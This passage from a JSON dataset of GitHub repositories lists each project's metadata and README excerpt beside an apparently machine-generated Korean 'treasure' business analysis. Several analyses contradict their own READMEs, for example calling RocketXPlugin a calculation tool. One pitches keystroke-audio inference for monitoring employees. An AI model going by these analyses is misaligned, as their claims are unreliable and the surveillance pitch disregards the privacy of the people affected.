smoothing process. This can be useful to identify outliers and anomalies in time-series.\n\nIn relation to the smoothing method used, the interval types available are:\n\n- sigma interva","composite_score":0.5258,"license_safety_tag":"safe"},{"name":"rebassjs/rebass","github_url":"https://github.com/rebassjs/rebass","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":34,"description":"# Rebass 오픈소스 프로젝트 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 버튼, 입력창 같은 기본 부품들을 빠르게 조립할 수 있게 해주는 디자인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 대시보드나 관리 화면을 빠르게 만들 때 기본 UI 부품 라이브러리로 활용\n2. **내부 업무 도구**: 회사 직원들이 사용","readme_excerpt":"\n<img src='https://rebassjs.org/logo.svg' width='128' height='128' />\n\n# Rebass\n\nReact primitive UI components built with [Styled System][].\nhttps://rebassjs.org\n\n[![Build Status][badge]][travis]\n[![Coverage][coverage-badge]][coverage]\n[![Downloads][downloads-badge]][npm]\n[![Version][version-badge]][npm]\n[![MIT License][license-badge]](LICENSE.md)\n\n[badge]: https://flat.badgen.net/travis/rebassjs/rebass/master\n[travis]: https://travis-ci.org/rebassjs/rebass\n[coverage-badge]: https://flat.badgen.net/codecov/c/github/rebassjs/rebass\n[coverage]: https://codecov.io/github/rebassjs/rebass\n\n[downloads-badge]: https://flat.badgen.net/npm/dw/rebass\n[version-badge]: https://flat.badgen.net/npm/v/rebass\n[license-badge]: https://flat.badgen.net/badge/license/MIT/blue\n[npm]: https://npmjs.com/package/rebass\n\n```sh\nnpm i rebass\n```\n\n## Getting Started\n\n```jsx\nimport React from 'react'\nimport { Box, Heading, Button } from 'rebass'\n\nexport default props =>\n  <Box>\n    <Heading>Hello</Heading>\n    <Bu","composite_score":0.5257,"license_safety_tag":"safe"},{"name":"trycatchx/RocketXPlugin","github_url":"https://github.com/trycatchx/RocketXPlugin","stars":8,"language":"Kotlin","license":"unknown","abandonment_months":39,"description":"# RocketXPlugin 사업화 분석\n\n## 왜 보물인가\n복잡한 계산 작업을 자동화하는 플러그인으로, 업무 효율성을 크게 높일 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **회계 소프트웨어 SaaS**: 세금 계산, 송금 내역 자동 정리 기능으로 중소기업 경리팀을 지원\n2. **전자상거래 플랫폼**: 상품 가격 책정, 할인율 계산, ","readme_excerpt":"\n<p align=\"center\">\n  <a href=\"https://github.com/trycatchx/RocketXPlugin\">\n    <img width=\"200\" src=\"https://github.com/trycatchx/RocketXPlugin/blob/master/rocketX-studio-plugin/resources/META-INF/pluginIcon.svg\">\n  </a>\n</p>\n\n<h1 align=\"center\">RocketX</h1>\n<div align=\"center\">\n\n本插件自动识别未改动 module 并在编译流程中替换为 aar ，做到只编译当前改动的 module，加速 Android apk 的编译速度。让你体验到所有模块都是 aar 的速度，又能保留所有的 module 便于修改，完美！（开源不易，希望朋友小手一抖，右上角来个star，感谢🙏）\n\n</div>\n\n<div align=\"center\">\n\n[English Document](https://github.com/trycatchx/RocketXPlugin/blob/master/README-EN.md)  | [Blog讲解](https://juejin.cn/post/7038157787976695815)\n\n</div>\n\n## 编译速度对比\n\n![2788235-0f027965fefc94f7](https://user-images.githubusercontent.com/6050250/222663410-12d0ffcc-4b80-445f-98d0-472e2b7f05c6.png)\n\n## AGP 版本兼容\nPlugin version | Gradle version\n---|---\n4.0.0+ | 6.1.1+\n4.1.0+ | 6.5+\n4.2.0+ |6.7.1+\n7.0    |7.0+\n\n## 如何使用\n\n* 依赖 gradle 插件\n\n```\n// app module 的 build.gradle 加入\napply plugin: 'com.rocketx'\n\n// 在根目录的 build.gradle 加入\nbuildscript {\n    de","composite_score":0.5256,"license_safety_tag":"unknown"},{"name":"ggerganov/kbd-audio","github_url":"https://github.com/ggerganov/kbd-audio","stars":69,"language":"C++","license":"MIT","abandonment_months":41,"description":"# kbd-audio 저장소 분석\n\n## 왜 보물인가\n컴퓨터 자판소리를 분석해서 어떤 글자를 입력하는지 추측할 수 있는 기술로, 보안 감시나 개인정보 보호 분야에서 핵심 가치를 가집니다.\n\n## 어디에 쓸 수 있나\n1. **보안 모니터링 SaaS**: 기업 직원들의 입력 패턴을 분석해 정보 유출을 감지하는 엔터프라이즈 솔루션\n2. **개인정보 보호 내부 도","readme_excerpt":"kbd-audio\n=====\n[![Actions Status](https://github.com/ggerganov/kbd-audio/workflows/CI/badge.svg)](https://github.com/ggerganov/kbd-audio/actions)\n\nThis is a collection of command-line and GUI tools for capturing and analyzing audio data.\n\n### Keytap\n\nThe most interesting tool is called **keytap** - it can guess pressed keyboard keys only by analyzing the audio captured from the computer's microphone.\n\nCheck this blog post for more details:\n\n[Keytap: description and some random thoughts](https://ggerganov.github.io/jekyll/update/2018/11/30/keytap-description-and-thoughts.html)\n\n[Video: short demo of Keytap in action](https://www.youtube.com/watch?v=2OjzI9m7W10)\n\n[Try it online:](https://ggerganov.github.io/keytap)\n\n<a href=\"https://ggerganov.github.io/keytap\" target=\"_blank\"><img src=\"https://i.imgur.com/FXa60Pr.gif\" style=\"display: inline-block; overflow: hidden; width: 99%;\"></img></a>\n\n### Keytap2\n\nThe **keytap2** tool is another interesting tool for recovering text from audio. It d","composite_score":0.5256,"license_safety_tag":"safe"},{"name":"mars/create-react-app-buildpack","github_url":"https://github.com/mars/create-react-app-buildpack","stars":5,"language":"Shell","license":"MIT","abandonment_months":48,"description":"# mars/create-react-app-buildpack 분석\n\n## 왜 보물인가\n웹 애플리케이션을 만드는 과정을 자동으로 간단하게 해주는 도구로, 개발자들의 반복 작업을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **웹 기반 SaaS 서비스**: 고객이 웹브라우저에서 사용하는 협업 도구나 프로젝트 관리 플랫폼의 기초 기술로 활용\n2. **기업 내부 ","readme_excerpt":"Heroku Buildpack for create-react-app\n=====================================\n\nAfter a long, useful run, this buildpack is now at its end of life 🌅\n\nThe underlying [static web server buildpack](https://github.com/heroku/heroku-buildpack-static) is deprecated and will not be supported on Heroku-22 or newer stacks.\n\nPlease look into using [Next.js](https://nextjs.org) or [Remix](https://remix.run) to develop React apps which are deployable using the [Node.js buildpack](https://github.com/heroku/heroku-buildpack-nodejs).\n\n----------\n\nOriginal README is still available on the [final release tag](https://github.com/mars/create-react-app-buildpack/tree/v9.0.1).\n","composite_score":0.5255,"license_safety_tag":"safe"},{"name":"chandez/Estados-Cidades-IBGE","github_url":"https://github.com/chandez/Estados-Cidades-IBGE","stars":499,"language":"","license":"unknown","abandonment_months":68,"description":"# chandez/Estados-Cidades-IBGE 평가\n\n## 왜 보물인가\n브라질의 모든 도시와 지역 정보를 정리한 데이터로, 지도·배송·통계 서비스를 만드는 기업들이 필수적으로 필요로 하는 기초 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **배송 서비스**: 택배사나 이커머스 기업이 배송지 자동 검증 기능을 제공할 때 사용\n2. **통계 분석 플랫","readme_excerpt":"## Dataset em SQL, JSON e CSV com todos os Estados, Municipios, Bairros e Regiões do Brasil\n\nOs dados se encontram com o código oficial do IBGE.\n\n27 Estados \n5.570 Municipios\n14.320 Bairros\n5 Regiões (Norte, Nordeste, Sudeste, Sul, Centro-Oeste)\n\nÉ possível verificar os dados utilizados nos scripts no sistema [SIDRA](https://sidra.ibge.gov.br/territorio) e efetuar downloads das planilhas.\n","composite_score":0.5255,"license_safety_tag":"unknown"},{"name":"hlmd/Postman-cn","github_url":"https://github.com/hlmd/Postman-cn","stars":9,"language":"PHP","license":"unknown","abandonment_months":52,"description":"# hlmd/Postman-cn 보물 분석\n\n## 왜 보물인가\nAPI 테스트 도구의 중국 현지화 버전으로, 중국 시장의 개발자들을 위한 맞춤형 솔루션을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중국 내 개발팀을 위한 클라우드 기반 API 협업 플랫폼으로 운영\n2. **내부 업무 도구**: 중국 소프트웨어 회사들의 개발팀이 AP","readme_excerpt":"# Postman 中文版\n最新中文版本：9.12.2  \n更新时间：2022-02-06  \n本地部署汉化请看：[本地部署](LOCAL.md)  \n汉化请按照下面[步骤](#步骤)：\n\n## 步骤\n1. [**下载&安装Postman**](#1下载安装postman)\n2. [**安装中文包**](#2安装中文包)  \n   [**Windows**](#Windows)  \n   [**Mac**](#Mac)  \n   [**Linux**](#Linux)\n\n## 帮助\n[Postman官方文档](https://learning.postman.com/docs)  \nQQ群：[494969115](https://jq.qq.com/?_wv=1027&k=WAheqTCx)  \n不使用联网工作区，可以点开右上角设置图标中的便笺(Scratch Pad)模式  \n[**禁用自动更新❗❗❗**](#禁用自动更新)\n\n\n## 1.下载&安装Postman\n### [下载Postman](https://www.postman.com/downloads/)\n|最新版本下载|[官方下载页面](https://www.postman.com/downloads/) 下载链接：[Win64](https://dl.pstmn.io/download/latest/win64)  [Win32](https://dl.pstmn.io/download/latest/win32)  [Mac](https://dl.pstmn.io/download/latest/osx)  [Linux](https://dl.pstmn.io/download/latest/linux)  |\n|---|---|\n|-|**注意** 👇👇👇👇👇 看下面 👇👇👇👇👇 **注意**|\n|**历史版本下载**|请把下面链接的\"版本号\"替换为指定的版本号，例如：8.8.0|\n|Windows64位|https://dl.pstmn.io/download/version/版本号/win64|\n|Windows32位|https://dl.pstmn.io/download/version/版本号/win32|\n|Mac Intel Chip|https://dl.pstmn.io/","composite_score":0.5255,"license_safety_tag":"unknown"},{"name":"typekit/webfontloader","github_url":"https://github.com/typekit/webfontloader","stars":6,"language":"JavaScript","license":"apache-2.0","abandonment_months":29,"description":"# typekit/webfontloader 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 글꼴을 더 빠르고 멋지게 표시하는 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 빌더 SaaS**: Wix, Squarespace 같은 서비스에 기본 기능으로 내장하여 사용자들이 자유롭게 글꼴을 선택하도록 제공\n2. **콘","readme_excerpt":"# Web Font Loader\n\nWeb Font Loader gives you added control when using linked fonts via `@font-face`. It provides a common interface to loading fonts regardless of the source, then adds a standard set of events you may use to control the loading experience. The Web Font Loader is able to load fonts from [Google Fonts](http://www.google.com/fonts/), [Typekit](http://www.typekit.com/),  [Fonts.com](http://www.fonts.com/), and [Fontdeck](http://fontdeck.com/), as well as self-hosted web fonts. It is co-developed by [Google](http://www.google.com/) and [Typekit](http://www.typekit.com).\n\n[![Build Status](https://travis-ci.org/typekit/webfontloader.svg?branch=master)](https://travis-ci.org/typekit/webfontloader)\n\n## Contents\n\n* [Get started](#get-started)\n* [Configuration](#configuration)\n    * [Events](#events)\n    * [Timeout](#timeouts)\n    * [Iframes](#iframes)\n* [Modules](#modules)\n    * [Adobe Edge Web Fonts](#adobe-edge-web-fonts)\n    * [Custom](#custom)\n    * [Fontdeck](#fontdeck)\n   ","composite_score":0.5254,"license_safety_tag":"safe"},{"name":"vinitshahdeo/Hacktoberfest2021","github_url":"https://github.com/vinitshahdeo/Hacktoberfest2021","stars":7,"language":"","license":"MIT","abandonment_months":25,"description":"# Hacktoberfest2021 저장소 분석\n\n## 왜 보물인가\n초보자들이 오픈소스 프로젝트에 기여하는 방법을 배우고 실습할 수 있는 학습 플랫폼으로, 전 세계 개발자 커뮤니티와 연결되는 입문 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 SaaS**: 대학교와 부트캠프에 오픈소스 참여 과정을 제공하는 온라인 교육 플랫폼\n2. **기업 인","readme_excerpt":"\n[![Hacktoberfest 2021](./assets/logo.png)](https://vinitshahdeo.dev/hacktoberfest-2021)\n# Hacktoberfest 2021\n\n[![Open Source Love](https://badges.frapsoft.com/os/v2/open-source.svg?v=103)](https://github.com/vinitshahdeo) [![GitHub license](https://img.shields.io/github/license/vinitshahdeo/HacktoberFest2K19?logo=GITHUB&style=flat)](https://github.com/vinitshahdeo/Hacktoberfest2021/blob/master/LICENSE) [![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fvinitshahdeo%2FHacktoberfest2021&count_bg=%23DD8524&title_bg=%23555555&icon=github.svg&icon_color=%23E7E7E7&title=visitors&edge_flat=false)](https://vinitshahdeo.github.io/Hacktoberfest2021/) [![Check out blog on Hashnode](https://img.shields.io/badge/Check%20blog-2962FF?logo=hashnode&logoColor=white)](https://vinitshahdeo.dev/beginner-friendly-issues-for-hacktoberfest-2021) [![Join our Discord](https://img.shields.io/badge/Join-Discord-8CA1A5?logo=discord&logoColor=white)](https://discord.gg/Mg","composite_score":0.5253,"license_safety_tag":"safe"},{"name":"heucoder/dimensionality_reduction_alo_codes","github_url":"https://github.com/heucoder/dimensionality_reduction_alo_codes","stars":38,"language":"Python","license":"Apache-2.0","abandonment_months":37,"description":"","readme_excerpt":"# DimensionalityReduction_alo_codes\n\n**网上关于各种降维算法的资料参差不齐，同时大部分不提供源代码；在此通过借鉴资料实现了一些经典降维算法的Demo(python)，同时也给出了参考资料的链接。**\n\n降维算法|资料链接|代码|展示|\n---|---|---|---\nPCA | [资料链接１](https://blog.csdn.net/u013719780/article/details/78352262) [资料链接２](https://blog.csdn.net/u013719780/article/details/78352262) [资料链接３](https://blog.csdn.net/weixin_40604987/article/details/79632888) | [PCA](https://github.com/heucoder/dimensionality_reduction_alo_codes/tree/master/codes/PCA) | ![PCA](codes/PCA/PCA.png)\nKPCA | [资料链接1](https://blog.csdn.net/u013719780/article/details/78352262) [资料链接2](https://blog.csdn.net/u013719780/article/details/78352262) [资料链接3](https://blog.csdn.net/weixin_40604987/article/details/79632888) |[KPCA](https://github.com/heucoder/dimensionality_reduction_alo_codes/tree/master/codes/PCA) |![KPCA](codes/PCA/KPCA.png)\nLDA | [资料链接１](https://blog.csdn.net/ChenVast/article/details/79227945) [资料链接2](https://www.cnblogs.com/pinard/p/6244265.html) | [LDA](https://github.com/heucoder/dimensionality_","composite_score":0.5253,"license_safety_tag":"safe"},{"name":"alibaba/freeline","github_url":"https://github.com/alibaba/freeline","stars":10,"language":"Java","license":"BSD-3-Clause","abandonment_months":74,"description":"# Alibaba Freeline 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발 시 코드를 수정했을 때 변경 부분만 빠르게 반영하는 기술로, 개발자의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 도구 SaaS**: 개발자 팀을 위한 클라우드 기반 통합 개발 환경으로 구독 서비스화\n2. **기업 내부 개발 도구**:","readme_excerpt":"# Freeline\n\n![Freeline](http://ww4.sinaimg.cn/large/006tNc79gw1f6ooza8pkuj30h804gjrk.jpg)\n\n[![Release Version](https://img.shields.io/badge/release-0.8.8-red.svg)](https://github.com/alibaba/freeline/releases) [![BSD3 License](https://img.shields.io/badge/license-BSD3-blue.svg)](https://github.com/alibaba/freeline/blob/master/LICENSE) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/alibaba/freeline/pulls)\n\n*Freeline* is a super fast build tool for Android and an alternative to Instant Run. Caching reusable class files and resource indices, it enables incremental building Android apps, and optionally deploying the updates to your device by hot swap.\n\nSee [Freeline official website](https://www.freelinebuild.com) for more information.\n\nDeveloped and used by **Ant Fortune ([about us](https://www.antfortune.com/ \"about us\")) Android Team**, Freeline has been significantly saving time in daily work. Inspiring by **Buck** and **Instant Run** but ","composite_score":0.525,"license_safety_tag":"safe"},{"name":"susam/texme","github_url":"https://github.com/susam/texme","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":35,"description":"# susam/texme 분석 보고서\n\n## 왜 보물인가\n웹 페이지에서 수학 공식을 자동으로 예쁘게 표시해주는 도구로, 복잡한 설정 없이 수학 콘텐츠를 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 플랫폼 (SaaS)**\n- 학생과 강사를 위한 웹 기반 수학 강의실 서비스\n- 월 구독으로 수학 문제 자동 정렬 기능 제공\n\n**2","readme_excerpt":"TeXMe\n=====\n\nTeXMe is a lightweight JavaScript utility to create self-rendering\nMarkdown + LaTeX documents.\n\n[![View Demo][Demo SVG]][Demo URL]\n[![NPM Version][Version SVG]][NPM URL]\n[![JSDelivr Hits][JSDelivr SVG]][JSDelivr URL]\n[![MIT License][License SVG]][L]\n[![Twitter][Twitter SVG]][Twitter URL]\n[![Mastodon][Mastodon SVG]][Mastodon URL]\n\n[Demo SVG]: https://img.shields.io/badge/view-demo-brightgreen\n[Demo URL]: https://susam.github.io/texme/\n[Version SVG]: https://img.shields.io/npm/v/texme\n[NPM URL]: https://www.npmjs.com/package/texme\n[License SVG]: https://img.shields.io/badge/license-MIT-%233ea639\n[JSDelivr SVG]: https://data.jsdelivr.com/v1/package/npm/texme/badge?style=rounded\n[JSDelivr URL]: https://www.jsdelivr.com/package/npm/texme\n[Twitter SVG]: https://img.shields.io/badge/twitter-%40susam-%231d9bf0\n[Twitter URL]: https://twitter.com/susam\n[Mastodon SVG]: https://img.shields.io/badge/mastodon-%40susam-%236364ff\n[Mastodon URL]: https://mastodon.social/@susam\n\n\nContents\n-","composite_score":0.5248,"license_safety_tag":"safe"},{"name":"biaochenxuying/blog-vue-typescript","github_url":"https://github.com/biaochenxuying/blog-vue-typescript","stars":5,"language":"Vue","license":"unknown","abandonment_months":38,"description":"# biaochenxuying/blog-vue-typescript 분석\n\n## 왜 보물인가\nVue와 TypeScript라는 현대적 웹 기술로 만든 블로그 시스템으로, 기술 블로그를 운영하거나 포트폴리오를 만들고 싶은 사람들이 직접 활용하거나 커스터마이징할 수 있는 기초가 된다.\n\n## 어디에 쓸 수 있나\n1. **기술 블로그 SaaS**: 개발자들이 자신의","readme_excerpt":"![](https://upload-images.jianshu.io/upload_images/12890819-527034962df50506.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n\n## 简介\n\n**项目已经用 Vue3 + TypeScript + Vite2 + Vuex4 + Vue-Router4 + element-plus 重构完啦！**\n\nVue2 版本请点这里：[基于 Vue2 全家桶 + TypeScript + Element-UI](https://github.com/biaochenxuying/blog-vue-typescript/tree/vue2) 或者 [v2.0.0](https://github.com/biaochenxuying/blog-vue-typescript/releases/tag/v2.0.0)\n\n---\n\n此项目是基于 Vue3 全家桶 + TypeScript + element-plus 技术栈的简洁时尚博客网站。\n\n项目详情请猛戳该文章：\n\n- [Vue3 全家桶 + TS+ Vite2 + element-plus 搭建简洁时尚的博客网站实战及踩坑记](https://juejin.cn/post/6924687052005081095)\n\n\n## 效果\n\n效果图：\n\n- pc 端\n\n![](https://upload-images.jianshu.io/upload_images/12890819-9f5f1b384a27c6ff.gif?imageMogr2/auto-orient/strip)\n\n\n- 移动端\n\n![](https://upload-images.jianshu.io/upload_images/12890819-5370ed6dfbe61051.gif?imageMogr2/auto-orient/strip)\n\n\n<!-- 完整效果请看：[https://biaochenxuying.cn](https://biaochenxuying.cn) -->\n\n\n## 功能\n\n### 已经完成功能\n\n- [x] 登录  \n- [x] 注册  \n- [x] 文章列表\n- [x] 文章归档\n- ","composite_score":0.5248,"license_safety_tag":"unknown"},{"name":"ayuer/shanghai_house_knowledge","github_url":"https://github.com/ayuer/shanghai_house_knowledge","stars":6,"language":"","license":"MIT","abandonment_months":59,"description":"# Shanghai House Knowledge 저장소 평가\n\n## 왜 보물인가\n상하이 부동산 시장의 복잡한 규칙과 정보를 정리한 자료로, 부동산 관련 서비스나 투자 도구의 기초 데이터로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 부동산 중개 플랫폼**\n중국 구매자를 대상으로 한 상하이 주택 거래 정보 제공 서비스로 월 구독형 SaaS 운영","readme_excerpt":"2020年11月在上海买房经历总结出来的买房购房做的一些功课分享给大家，本着开源的精神，希望对大家也能有所帮助。启发来自这位同学2017年做的 [杭州购房分享](https://github.com/houshanren/hangzhou_house_knowledge)，本文也发布在Github[上海购房知识汇总](https://github.com/ayuer/shanghai_house_knowledge)，欢迎有兴趣的同学Star和发PR来共同维护。\n\n```\n-- 图片来自网络，侵权删\n-- 数据不保证安全准确，错误之处还望海涵，如需深入使用还望自己求证\n-- 买房有风险，投资需谨慎，资料内容不保证完全正确，使用需谨慎\n-- 此处尽量不展示个人观点和看法，如果有观点和看法请还请自己思考和判断其适用性和准确性\n```\n\n*   [Part 1：宏观政策与分析](#宏观政策)\n    *   [1.1 城市定位](#城市定位)\n    *   [1.2 人口目标](#人口目标)\n    *   [1.3 发展规划](#发展规划)\n    *   [1.4 土拍分析](#土拍分析)\n    *   [1.5 住宅用地规划](#住宅用地规划)\n    *   [1.6 轨道交通现状与规划](#轨道交通现状与规划)\n    *   [1.7 高架&城市快速路现状与规划](#城市快速路)\n    *   [1.8 人才引进落户政策](#人才引进落户政策)\n    *   [1.9 房产报告](#房产报告)\n*   [Part 2: 选房](#选房)\n    *   [2.1 了解自己的需求](#了解自己的需求)\n    *   [2.2 房产信息渠道](#房产信息渠道)\n    *   [2.3 Location! Location! Location! 位置地段](#位置地段)\n        *    [2.3.1 上海市行政区划](#上海市行政区划)\n        *    [2.3.2 各区板块](#各区板块与天花板价)\n    *   [2.4 全上海热门新房楼盘分布2020版](#全上海热门新房楼盘分布2020版)\n    *   [2.5 上海市二手房2020](#上海市二手房2020)\n        *    [2.5.1 2020前十月成交趋","composite_score":0.5247,"license_safety_tag":"safe"},{"name":"piotte13/SIMD-Visualiser","github_url":"https://github.com/piotte13/SIMD-Visualiser","stars":71,"language":"JavaScript","license":"BSD-3-Clause","abandonment_months":39,"description":"# SIMD-Visualiser 상업화 분석\n\n## 왜 보물인가\n컴퓨터의 복잡한 연산 원리를 시각적으로 보여주는 교육 도구로, IT 교육 시장과 기술 학습 플랫폼에서 높은 수요가 있을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 프로그래밍 교육 SaaS**: 대학 및 부트캠프에서 구독형 시각화 학습 플랫폼으로 판매\n2. **기업 기술 연수 시","readme_excerpt":"\n# Live Version found here (Proof of concept)\n[http://piotte13.github.io/SIMD-Visualiser](http://piotte13.github.io/SIMD-Visualiser)\n\n![](doc/SIMD-Visualizer-Demo.gif)\n( This is a Prototype version, we are still in development! Thanks for your support  :-) \n# But wait, what is SIMD?\nSIMD (pronounced \"seem-dee\") is short for **Single Instruction/Multiple Data** which is one [classification of computer architectures](https://en.wikipedia.org/wiki/Flynn%27s_taxonomy \"classification of computer architectures\"). SIMD allows one operation to be performed on multiple data points simultaneously. Data level parallelism improves the performance of many tasks, including 3D graphics and video processing, physics simulations, and cryptography.\n\n# Why would one need to visualize it?\nThe first time I saw SIMD code, I almost had a heart attack.  My brain was overwhelmed, my stress level rose, my face turned white like a sheet of paper and cold sweats started to flow all over my body.  SIMD code is not","composite_score":0.5245,"license_safety_tag":"safe"},{"name":"TannerGilbert/Tutorials","github_url":"https://github.com/TannerGilbert/Tutorials","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":49,"description":"# TangerGilbert/Tutorials 상용화 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 초보자들을 위해 실무 기술을 쉽게 설명한 튜토리얼 모음으로, 교육 시장에서 수요가 많습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 SaaS**: 구독 기반 학습 플랫폼으로 초보자 대상 강의 콘텐츠 제공\n2. **기업 직원 교육 도구**: ","readme_excerpt":"# Tutorials\n\nThis repository contains the code for all my articles and videos.\n\n| Name         | Article | Video | Code |\n|:---------------:|:--------:|:----------:|:------:|\n| Generating text using a Recurrent Neural Network | [Link](https://gilberttanner.com/blog/generating-text-using-a-recurrent-neuralnetwork) | - | [Link](https://github.com/TannerGilbert/Tutorials/blob/master/Keras-Tutorials/4.%20LSTM%20Text%20Generation/Keras%20LSTM%20Text%20Generation.ipynb) |\n| Building a book Recommendation System using Keras | [Link](https://gilberttanner.com/blog/building-a-book-recommendation-system-usingkeras) | [Link](https://youtu.be/4vwNkHFuZBk) | [Link](https://github.com/TannerGilbert/Tutorials/blob/master/Recommendation%20System/Recommendation%20System.ipynb) |\n| Introduction to Web Scraping with BeautifulSoup | - | - | [Link](https://github.com/TannerGilbert/Tutorials/tree/master/Introduction%20to%20Web%20Scraping%20with%20BeautifulSoup) |\n| Scraping Reddit data | [Link](https://gilb","composite_score":0.5245,"license_safety_tag":"safe"},{"name":"jxnblk/mdx-deck","github_url":"https://github.com/jxnblk/mdx-deck","stars":18,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"","readme_excerpt":"![](https://s3.amazonaws.com/jxnblk/mdx-deck-2.gif)\n\n# MDX Deck <img src='docs/ace.png' width='24' height='24' />\n\nAward-winning React [MDX][]-based presentation decks\n\n[![Build Status][badge]][circleci]\n[![Version][]][npm]\n[![Downloads][]][npm]\n\n[badge]: https://flat.badgen.net/github/status/jxnblk/mdx-deck/master/ci/circleci\n[circleci]: https://circleci.com/gh/jxnblk/mdx-deck\n[version]: https://flat.badgen.net/npm/v/mdx-deck\n[downloads]: https://flat.badgen.net/npm/dm/mdx-deck\n[npm]: https://npmjs.com/package/mdx-deck\n\n- :memo: Write presentations in markdown\n- :atom_symbol: Import and use [React components](#imports)\n- :nail_care: Customizable [themes](#theming) and components\n- :zero: Zero-config CLI\n- :tipping_hand_woman: [Presenter mode](#presenter-mode)\n- :notebook: [Speaker notes](#speaker-notes)\n\n[View demo](https://mdx-deck.jxnblk.com)\n\n- [Getting Started](#getting-started)\n- [Using MDX](#using-mdx)\n- [Theming](#theming)\n- [Components](#components)\n- [Layouts](#layouts)\n- [Pr","composite_score":0.5244,"license_safety_tag":"safe"},{"name":"MoonBegonia/ninja","github_url":"https://github.com/MoonBegonia/ninja","stars":13,"language":"JavaScript","license":"unknown","abandonment_months":31,"description":"# MoonBegonia/ninja 저장소 분석\n\n## 왜 보물인가\n13개의 별 수준으로는 아직 미성숙한 프로젝트이며, 정확한 용도를 파악하기 위해 저장소의 README나 코드를 직접 확인해야 상품화 가능성을 판단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 자동화 도구**: 중소기업의 반복되는 업무를 자동으로 처리하는 시스템으로 판매\n2","readme_excerpt":"# Ninja\n\n一次对于 koa2 vue3 vite 的简单尝试\n\n## 说明\n\nNinja 仅供学习参考使用，请于下载后的 24 小时内删除，本人不对使用过程中出现的任何问题负责，包括但不限于 `数据丢失` `数据泄露`。\n\nNinja 仅支持 qinglong 2.8.2+\n\n[TG 频道](https://t.me/joinchat/sHKuteb_lfdjNmZl)\n\n## 特性\n\n- [x] 扫码，跳转登录添加/更新 cookie\n- [x] 添加/更新 cookie 后发送通知\n- [x] 扫码发送通知可关闭\n- [x] 添加备注并将通知中的 pt_pin nickName 修改为备注\n- [x] 默认备注为昵称\n- [x] 添加扫码推送卡片\n- [ ] 替换 cookie 失效通知\n- [ ] 登录界面展示自定义标语\n- [ ] 支持多容器，多面板\n- [ ] 采用自己的数据库，实现无视面板替换通知备注\n- [ ] 账号管理面板\n\n## 文档\n\n### 容器内\n\n1. 容器映射 5701 端口，ninja 目录至宿主机\n\n   例（docker-compose）：\n\n   ```diff\n   version: \"3\"\n   services:\n     qinglong:\n       image: whyour/qinglong:latest\n       container_name: qinglong\n       restart: unless-stopped\n       tty: true\n       ports:\n         - 5700:5700\n   +      - 5701:5701\n       environment:\n         - ENABLE_HANGUP=true\n         - ENABLE_WEB_PANEL=true\n       volumes:\n         - ./config:/ql/config\n         - ./log:/ql/log\n         - ./db:/ql/db\n         - ./repo:/ql/repo\n         - ./raw:/ql/raw\n         - ./scripts:/ql/scripts\n        ","composite_score":0.5233,"license_safety_tag":"unknown"},{"name":"swagger-api/swagger-node","github_url":"https://github.com/swagger-api/swagger-node","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":45,"description":"# Swagger Node 저장소 분석\n\n## 왜 보물인가\nAPI(프로그램 간 통신 규약)를 쉽게 만들고 관리할 수 있는 표준 도구로, 기업의 소프트웨어 개발 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 협업 도구 업체가 자사 API를 체계적으로 관리하고 개발자에게 제공\n2. **내부 업무 도구**: ","readme_excerpt":"# Archived\n\nThis GitHub repository has been archived. \nThe npmjs package `swagger` may be re-used at a later date for a different project.\nhttps://swagger.io/ may have similar or alternative functionality if you depend(ed) on this project.\n\n\n[![Build Status](https://travis-ci.org/swagger-api/swagger-node.svg?branch=master)](https://travis-ci.org/swagger-api/swagger-node) \n[![NPM version](https://badge.fury.io/js/swagger.png)](http://badge.fury.io/js/swagger)\n[![Dependency Status](https://david-dm.org/swagger-api/swagger-node/status.svg)](https://david-dm.org/swagger-api/swagger-node)\n[![devDependency Status](https://david-dm.org/swagger-api/swagger-node/dev-status.svg)](https://david-dm.org/swagger-api/swagger-node#info=devDependencies)\n\n\nThe `swagger` module provides tools for designing and building Swagger-compliant APIs entirely in Node.js. It integrates with popular Node.js servers, including Express, Hapi, Restify, and Sails, as well as any Connect-based middleware. With `swagger`","composite_score":0.5231,"license_safety_tag":"safe"},{"name":"liaozihong/SpringBoot-Learning","github_url":"https://github.com/liaozihong/SpringBoot-Learning","stars":500,"language":"Java","license":"unknown","abandonment_months":56,"description":"# SpringBoot-Learning 저장소 분석\n\n## 왜 보물인가\n500명이 관심을 가질 정도로 많은 개발자들이 찾는 자료는, 기업의 핵심 시스템을 구축하는 데 필요한 검증된 학습 자료라는 뜻입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (웹 기반 구독형 서비스)**\n- 이 학습 자료를 바탕으로 기업용 클라우드 관리 시스템이나 협업 도","readme_excerpt":"### 学习SpringBoot所记\n\n### 项目构建\n```\ngit clone 